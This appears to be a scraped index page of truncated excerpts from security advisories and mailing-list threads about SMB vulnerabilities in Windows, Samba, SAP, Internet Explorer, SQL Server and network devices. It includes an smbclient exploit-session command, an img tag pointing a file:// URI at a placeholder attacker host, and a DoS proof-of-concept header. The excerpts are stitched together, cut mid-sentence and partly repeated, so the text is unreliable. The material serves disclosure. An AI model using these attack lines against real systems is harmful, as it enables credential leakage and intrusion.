Next Page >>
SMB
(to get the scripts mentioned by this advisory please get the full
version at http://www.hexale.org/advisories/OCHOA-2010-0209.txt; I did
not include them here to reduce the size of this email)
Windows SMB NTLM Authentication Weak Nonce Vulnerability
Security Advisory
Hernan Ochoa (hernan@gmail.com) - Agustin Azubel (agustin.azubel@gmail.com)
Title: Windows SMB NTLM Authentication Weak Nonce Vulnerability
===============================================================================
Stratsec Security Advisory: SS-2010-003
===============================================================================
Title: Microsoft SMB Client Pool Overflow (MS10-006)
Version: 1.0
Issue type: Pool overflow
Affected vendor: Microsoft
Release date: 09/02/2010
Discovered by: Laurent Gaffi
in this case this is a preauth exploit.
The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).
Exploit session (using the patched smbclient exploit):
smb is a samba user created.
root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
exploited remotely and causes corruption of kernel memory, which leads
to a Windows stop error (blue screen) or to arbitrary code execution.
The vulnerability is triggered during processing of a crafted TCP
segment destined to TCP port 139 or 445. These ports are used by the
Microsoft Server Message Block (SMB) protocol.
Cisco has released free software updates that address this
vulnerability.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5580 has
/*
*
* SMB SRV2.SYS Denial of Service PoC
* Release Date: Sep 8, 2009
* Severity: Medium/High
* Systems Affected: Windows Vista SP1+SP2, Windows 2008 SP2, Windows 7 Beta + RC
* Discovered by: Laurent Gaffi
*
* Description:
* SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
[DSECRG-11-038] SAP RSTXSCRP report - smb relay vulnerability
SAP RSTXSCRP Report has path traversal vulnerability which can lead to SMB relay attack and full control on system.
Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: Path traversal, SMBRelay
The cookies folder is hardcoded inside the Explorer engine as a
restricted site. You can check it by looking at the status bar when
browsing this folder with Windows Explorer.
When requesting a resource, for example, in the 'src' attribute of an
HTML 'img' tag, Internet Explorer allows the usage of 'smb' URIs. So,
when IE attempts to render the following line:
/-----------
<img src="file://IP_OR_HOSTNAME/PATH_TO_RESOURCE">
. Only run IE in Protected Mode if it is available on the operating
system.
. Use a different web browser to navigate untrusted web sites.
Additionally, although disabling file sharing if it is not necessary and
filtering outbound SMB connections at the endpoint or network perimeter
may not prevent exploitation it is generally a good security measure to
prevent disclosure of sensitive information such as valid usernames of
endpoint users.
Microsoft has issued a patch to fix the vulnerability and a detailed
Vulnerability and Exploit: Javier Vicente Vallejo, http://www.vallejo.cc
Vulnerability Analysis: Ruben Santamarta, http://www.reversemode.com
Abstract
Microsoft Windows is prone to a remote Kernel Denial of Service due to the way srv.sys handles malformed WRITE_ANDX SMB packets.
Remote attackers could exploit this issue without having valid credentials on the target machine. In order to achieve a successful exploitation, the attacker needs enough privileges to remotely send WRITE_ANDX packets to an interface that uses a Named Pipe as endpoint. Those interfaces that allow NULL Sessions vary between Windows versions, in Vista the reliability of a preauth attack through the “\LSARPC” has been successfully demonstrated.
Affected versions
Discussion:
Addonics NAS Adapter Post-Auth DoS
Addonics NAS Adapter is prone to several post authentication buffer overflows. Each of these buffer overflows will crash the entire TCP/IP stack and the device will have to be power cycled to restore any functionality. Addonics currently has implemented GUI level (client side) controls for preventing long inputs, but by simply doing a direct HTTP GET request (the device doesn't use POST) this can be bypassed.
Addonics was notified of the buffer overflows via ticket 497283 submitted Monday, February 09, 2009 at 6:03:35 PM. I called Addonics 3/4/09 at 12:44, told that they have confirmed the BoF condition, and engineers are working on a fix. They released an update that did not address the fix (NASU2FW41 Loader 1.17) which made the buffer 2 characters longer in order to crash except for the SMB password.
Exploiting these issues will crash the network stack and create a Denial of Service condition.
Firmware R3282-1.33c LOADER32 1.15 , and NASU2FW41 Loader1.17 are vulnerable; other versions may also be.
s/at least//
[ well-known facts snipped ]
> The Windows SMB server apparently won't cross reparse points, though, so
> there's no equivalent vulnerability.
NO, Windows SMB server crosses reparse points!
But as Dan Kaminsky pointed out, you need to have administrative rights
> [ well-known facts snipped ]
So ... your original note about junctions did not cover "well-known
facts", but my note about other reparse point types did?
> > The Windows SMB server apparently won't cross reparse points,
though,
> > so there's no equivalent vulnerability.
>
> NO, Windows SMB server crosses reparse points!
Please find further information here:
http://blog.acrossecurity.com/2011/05/anatomy-of-com-server-based-binary.html
http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html
In general there are two types of remote binary planting exploits: SMB and WebDAV.
The former works inside (local) networks where firewalls block outbound SMB traffic.
WebDAV attacks work through firewalls too since many firewalls allow outbound WebDAV
traffic and Windows silently fall back to WebDAV if SMB doesn't work. If our online
remote exploit doesn't work for you, you can download the PoC locally and test it in
your local network.
for the execution of arbitrary code.
Background
==========
Samba is a suite of SMB and CIFS client/server programs.
Affected packages
=================
-------------------------------------------------------------------
> Please find further information here:
>
> http://blog.acrossecurity.com/2011/05/anatomy-of-com-server-based-binary.html
> http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html
>
> In general there are two types of remote binary planting exploits: SMB and WebDAV.
> The former works inside (local) networks where firewalls block outbound SMB traffic.
> WebDAV attacks work through firewalls too since many firewalls allow outbound WebDAV
> traffic and Windows silently fall back to WebDAV if SMB doesn't work. If our online
> remote exploit doesn't work for you, you can download the PoC locally and test it in
> your local network.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
==========================================================
==
== Subject: Boundary failure when parsing SMB responses
== can result in a buffer overrun
==
== CVE ID#: CVE-2008-1105
==
== Versions: Samba 3.0.0 - 3.0.29 (inclusive)
======================================================================
Secunia Research 28/05/2008
- Samba "receive_smb_raw()" Buffer Overflow Vulnerability -
======================================================================
Table of Contents
Affected Software....................................................1
Please find further information here:
http://blog.acrossecurity.com/2011/05/anatomy-of-com-server-based-binary.html
http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html
In general there are two types of remote binary planting exploits: SMB and WebDAV.
The former works inside (local) networks where firewalls block outbound SMB traffic.
WebDAV attacks work through firewalls too since many firewalls allow outbound WebDAV
traffic and Windows silently fall back to WebDAV if SMB doesn't work. If our online
remote exploit doesn't work for you, you can download the PoC locally and test it in
your local network.
>>
>> http://blog.acrossecurity.com/2011/05/anatomy-of-com-server-based-binary.html
>> http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html
>>
>> In general there are two types of remote binary planting exploits:
>> SMB and WebDAV.
>> The former works inside (local) networks where firewalls block
>> outbound SMB traffic.
>> WebDAV attacks work through firewalls too since many firewalls
>> allow outbound WebDAV
>> traffic and Windows silently fall back to WebDAV if SMB doesn't
One method of executable delivery is through the onenote://
URL protocol if Microsoft OneNote is installed.
OneNote will automatically open and process a onenote file shared
over an SMB share. Any executables stored within the onenote file
will be cached locally. This is done by downloading the embedded
executables and storing them in a known location.
C:/Users/[USERNAME]/AppData/Local/Microsoft/OneNote/12.0/OneNoteOfflineCache
_Files/
Hash: SHA1
Hi,
Considering that there are not updates available for Samba on ASUS Eee
PC (it runs a modified version o Samba as far as we know, smb protocol
is only partially supported), and even considering the fact that it is
Linux and not Microsoft Windows (the main reason that made us write this
blog post), we think it is not the same scenario.
Best regards,
ZDI-09-002: Microsoft SMB NT Trans2 Request Parsing Remote Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-002
January 13, 2009
-- CVE ID:
CVE-2008-4835
-- Affected Vendors:
Microsoft
remote user when a Skype link was clicked.
Changes were made to Skype to remove available command line arguments when
the /URI argument is present, and to resolve the discovered injection vulnerability.
Although many of the useful arguments have been disallowed, Security-Assessment.com
found that the /Datapath argument can be included and directed to a remote SMB
share directly through a specially crafted Skype URI.
The Datapath argument specifies the location of the Skype configuration files and
security policy. Specifying a Datapath argument will override any local security
policy defined in the Windows registry.
ZDI-09-001: Microsoft SMB NT Trans Request Parsing Remote Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-001
January 13, 2009
-- CVE ID:
CVE-2008-4834
-- Affected Vendors:
Microsoft
The target function can be run by any user with access to query the
database. This attack could also be conducted anonymously through a Web
application if it contained an SQL Injection vulnerability.
For the server to load the corrupted backup file, an attacker would have
to supply a path to a remote file using either SMB or WebDAV.
IV. DETECTION
iDefense confirmed the existence of this vulnerability in Microsoft SQL
Server 2005 Service Pack 2 Hot Fix 4. Additional tests against SQL
specified DBMS tables/columns, run his own SQL statement, read or
write either text or binary files on the file system, execute
arbitrary commands on the operating system, establish an out-of-band
stateful connection between the attacker box and the database server
via Metasploit payload stager, database stored procedure buffer
overflow exploitation or SMB relay attack and more.
Changes
=======
Remote exploitation of a buffer overflow vulnerability within Samba
Project's Samba could allow an attacker to execute arbitrary code with
root privileges.
This vulnerability exists in a certain function within Samba, where an
attacker could trigger a memory corruption by sending specially crafted
SMB requests resulting in heap memory overwritten with attacker supplied
data, which can allow attackers to execute code remotely.
III. ANALYSIS
Exploitation allows attackers to execute arbitrary code on the targeted
Dear Alexandr Polyakov,
AFAIK, SMB NTLM relaying was closed with MS08-068 and Kerberos was never
possible to relay. Are you sure authentication is really possible with
patched windows systems?
--Monday, April 25, 2011, 12:21:57 PM, you wrote to bugtraq@securityfocus.com:
I. BACKGROUND
The snoop command line utility is installed by default on Solaris. It is
used to capture and display network traffic, similar to the widely used
tcpdump program. Server Message Block (SMB), is a network protocol used
for Microsoft Windows file sharing. More information can be found on the
vendor's website at the following URL.
http://docs.sun.com/app/docs/doc/816-0211/6m6nc677k?a=view
Problem Description:
This advisory updates wireshark to the latest version(s), fixing
several security issues:
* The SMB dissector could dereference a NULL pointer. (Bug 4734)
* J. Oquendo discovered that the ASN.1 BER dissector could overrun
the stack.
* The SMB PIPE dissector could dereference a NULL pointer on some
platforms.
* The SigComp Universal Decompressor Virtual Machine could go into
Next Page>>
|
